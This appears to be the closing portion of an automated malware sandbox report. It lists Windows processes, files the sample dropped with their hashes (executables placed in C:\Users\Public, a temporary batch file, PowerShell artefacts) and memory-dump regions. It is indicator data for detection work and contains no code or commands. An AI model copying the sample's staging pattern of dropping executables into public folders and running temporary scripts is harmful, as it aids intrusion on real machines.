                                                                                                                            C:\Windows\System32\WaaSMedicAgent.exe 81f5e01d44bc9ba99745e02eae6b9ff7 vXmy8xMKLk+wLqGyovnvWw.0.1.0.0.0
                                                                                                                            1⤵
                                                                                                                              PID:4584
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                2⤵
                                                                                                                                  PID:1384
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                1⤵
                                                                                                                                  PID:5040
                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  PID:4536
                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:3648
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:4868
                                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:1852
                                                                                                                                    • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                      C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      PID:1580

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                    Replay Monitor

                                                                                                                                    Loading Replay Monitor...

                                                                                                                                    Downloads

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svClient.exe.log

                                                                                                                                      Filesize

                                                                                                                                      859B

                                                                                                                                      MD5

                                                                                                                                      e204f3d12abd1691ce1f149399441188

                                                                                                                                      SHA1

                                                                                                                                      798042095539abfe857e456fca4e1035f67d29bf

                                                                                                                                      SHA256

                                                                                                                                      685f70bf685f654651dcd0acc495b6f52f02f73cc3ca8b3d2c8433aac9ba144d

                                                                                                                                      SHA512

                                                                                                                                      804c5ea57a59f86fd0c34479be4c479230bff79093548e8461758829928969da565c211ccc9cb9befa0fef15f0400a5b1f17d5ddf88aef6ff01b67a191176b9f

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      ba246bd2d86f16b8e701e797989d424b

                                                                                                                                      SHA1

                                                                                                                                      048769be2e48bd66ddedbfcf9d40addb6168fc16

                                                                                                                                      SHA256

                                                                                                                                      37c38ce312bc65167a7a6208217dedc66559bd6dd149472fd7001a8e9db310ad

                                                                                                                                      SHA512

                                                                                                                                      473fedc38e188d36b1f2f3db119a5c6c1e8676a24392a64b60198ab38c6725a909b8564892608760cc2dfc6a1b4f72cf4370740f97dcb0722d3fd4e0faa57bec

                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                      Filesize

                                                                                                                                      18KB

                                                                                                                                      MD5

                                                                                                                                      ab015018b8d81b1a0f478b45b54c11df

                                                                                                                                      SHA1

                                                                                                                                      c7eaa75ff9388bbe7f924281b4f8369b307a85a5

                                                                                                                                      SHA256

                                                                                                                                      ce008663e49964eeb9a6471bdbdae7ae534c508a4158cb8d73d14917e2183f14

                                                                                                                                      SHA512

                                                                                                                                      5534308e8ffc490fe2d5d1bf34a43ed3767ecef5dccd3d22c1ff0a276b556f7fbc757699bc9060d4d34602b307f9e11f591ff7d3b28efda95d7759f94dc4a3e8

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzg5ois3.hpp.ps1

                                                                                                                                      Filesize

                                                                                                                                      60B

                                                                                                                                      MD5

                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                      SHA1

                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                      SHA256

                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                      SHA512

                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmpFD4C.tmp.bat

                                                                                                                                      Filesize

                                                                                                                                      145B

                                                                                                                                      MD5

                                                                                                                                      6b34230a9040467649498e2bb832180b

                                                                                                                                      SHA1

                                                                                                                                      97885089c7fb07cb61616c97a0783d23681774d0

                                                                                                                                      SHA256

                                                                                                                                      eb8f70d0b2e8c1196635e82aad3ff6fddcef3021f6734d397728d228e2e368ee

                                                                                                                                      SHA512

                                                                                                                                      6ce0cd988d9ec4fbf0f9e89dd8e277bd07da7d689ea6d4323065f88b9b6f1ddb7e18a45cd6150923e359d9d9d9601ad4551efeb503f4cd5d2355b97d34f8a253

                                                                                                                                    • C:\Users\Public\sv.exe

                                                                                                                                      Filesize

                                                                                                                                      163KB

                                                                                                                                      MD5

                                                                                                                                      b20e29f2b88234cda8b95b43a4fec8aa

                                                                                                                                      SHA1

                                                                                                                                      13cca52a0dc3b9b352e14688f444ad9bcb9a9f4f

                                                                                                                                      SHA256

                                                                                                                                      e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a

                                                                                                                                      SHA512

                                                                                                                                      019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a

                                                                                                                                    • C:\Users\Public\svClient.exe

                                                                                                                                      Filesize

                                                                                                                                      41KB

                                                                                                                                      MD5

                                                                                                                                      504d64de3a3ecf52cc257d723b616838

                                                                                                                                      SHA1

                                                                                                                                      725749227a5ddf0d19a08876462d18888f560cc9

                                                                                                                                      SHA256

                                                                                                                                      02df721f639ca11946fd9f5479dfcd6a183a0e1c214377619724970f66058aa3

                                                                                                                                      SHA512

                                                                                                                                      bbb9c3eb59fa596000cc554c60101907688adc6851b30252d541b176a7b312fb3019768a535ac0893102bdeed2e43fa83eb0ce9579cb0aac1f26d2b12fcaf299

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                      SHA1

                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                      SHA256

                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                      SHA512

                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                      SHA1

                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                      SHA256

                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                      SHA512

                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                      SHA1

                                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                      SHA256

                                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                      SHA512

                                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                      SHA1

                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                      SHA256

                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                      SHA512

                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                      SHA1

                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                      SHA256

                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                      SHA512

                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                      SHA1

                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                      SHA256

                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                      SHA512

                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                    • memory/384-152-0x000001FF93C30000-0x000001FF93C5A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/384-158-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/384-157-0x000001FF93C30000-0x000001FF93C5A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/512-162-0x0000027AB7C90000-0x0000027AB7CBA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/616-122-0x0000026E5E6E0000-0x0000026E5E705000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      148KB

                                                                                                                                    • memory/616-123-0x0000026E5EAB0000-0x0000026E5EADA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/616-124-0x0000026E5EAB0000-0x0000026E5EADA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/616-129-0x0000026E5EAB0000-0x0000026E5EADA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/616-130-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/668-134-0x000002146EB70000-0x000002146EB9A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/668-139-0x000002146EB70000-0x000002146EB9A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/668-140-0x00007FFBED910000-0x00007FFBED920000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/724-170-0x0000025F540A0000-0x0000025F540CA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/964-144-0x00000143427A0000-0x00000143427CA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/1992-116-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1992-112-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1992-111-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1992-119-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1992-109-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/1992-118-0x00007FFC2C630000-0x00007FFC2C6EE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/1992-117-0x00007FFC2D890000-0x00007FFC2DA85000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/1992-110-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/2424-61-0x00007FFC0F0C0000-0x00007FFC0FB81000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2424-16-0x0000000000460000-0x000000000046E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      56KB

                                                                                                                                    • memory/2424-18-0x00007FFC0F0C3000-0x00007FFC0F0C5000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      8KB

                                                                                                                                    • memory/2424-20-0x00007FFC0F0C0000-0x00007FFC0FB81000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2424-719-0x00007FFC0F0C0000-0x00007FFC0FB81000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      10.8MB

                                                                                                                                    • memory/2928-93-0x0000028E7E100000-0x0000028E7E122000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/2928-108-0x00007FFC2C630000-0x00007FFC2C6EE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      760KB

                                                                                                                                    • memory/2928-107-0x00007FFC2D890000-0x00007FFC2DA85000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                    • memory/2928-106-0x0000028E7E490000-0x0000028E7E4BA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      168KB

                                                                                                                                    • memory/4524-49-0x00000000077B0000-0x0000000007853000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      652KB

                                                                                                                                    • memory/4524-58-0x0000000007C10000-0x0000000007C18000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB

                                                                                                                                    • memory/4524-48-0x0000000006B70000-0x0000000006B8E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/4524-19-0x0000000002CB0000-0x0000000002CE6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      216KB

                                                                                                                                    • memory/4524-38-0x000000006FDA0000-0x000000006FDEC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/4524-57-0x0000000007C30000-0x0000000007C4A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/4524-56-0x0000000007B30000-0x0000000007B44000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      80KB

                                                                                                                                    • memory/4524-55-0x0000000007B20000-0x0000000007B2E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      56KB

                                                                                                                                    • memory/4524-54-0x0000000007AF0000-0x0000000007B01000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      68KB

                                                                                                                                    • memory/4524-53-0x0000000007B70000-0x0000000007C06000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      600KB

                                                                                                                                    • memory/4524-52-0x0000000007960000-0x000000000796A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/4524-37-0x0000000006B90000-0x0000000006BC2000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      200KB

                                                                                                                                    • memory/4524-50-0x0000000007F40000-0x00000000085BA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.5MB

                                                                                                                                    • memory/4524-21-0x0000000005940000-0x0000000005F68000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.2MB

                                                                                                                                    • memory/4524-24-0x0000000005610000-0x0000000005676000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/4524-23-0x00000000055A0000-0x0000000005606000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/4524-51-0x00000000078F0000-0x000000000790A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      104KB

                                                                                                                                    • memory/4524-36-0x00000000065F0000-0x000000000663C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/4524-35-0x00000000065D0000-0x00000000065EE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/4524-30-0x0000000005F90000-0x00000000062E4000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.3MB

                                                                                                                                    • memory/4524-22-0x0000000005500000-0x0000000005522000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/4572-83-0x000000006FDA0000-0x000000006FDEC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                    • memory/4572-78-0x00000000055F0000-0x0000000005944000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.3MB

                                                                                                                                    • memory/4860-0-0x0000000074DBE000-0x0000000074DBF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4860-105-0x0000000074DB0000-0x0000000075560000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      7.7MB

                                                                                                                                    • memory/4860-17-0x0000000074DB0000-0x0000000075560000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      7.7MB

                                                                                                                                    • memory/4860-3-0x0000000074DBE000-0x0000000074DBF000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/4860-2-0x0000000074DB0000-0x0000000075560000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      7.7MB

                                                                                                                                    • memory/4860-1-0x00000000007C0000-0x00000000007C8000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32KB